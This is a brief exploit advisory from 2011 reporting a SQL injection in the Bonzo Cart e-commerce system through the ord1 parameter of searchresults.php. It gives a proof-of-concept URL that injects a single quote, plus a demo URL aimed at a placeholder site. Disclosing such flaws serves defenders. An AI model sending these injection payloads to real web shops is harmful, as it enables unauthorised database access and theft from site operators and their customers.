# Exploit Title: Bonzo Cart (E-Commerce System) SQL Injection # Date: 2011 # Author: Eyup CELIK # Software Link: http://www.turnkeycentral.com # Version: All Version # Tested on: All versions are Vulnerability ISSUE SQL Injection can be done using the command input Example searchresults.php?ord1=&ord2=asc&search1=&SearchTerm=&where=ItemName Exploit: searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName Demo: http://site.com/bonzacart/searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName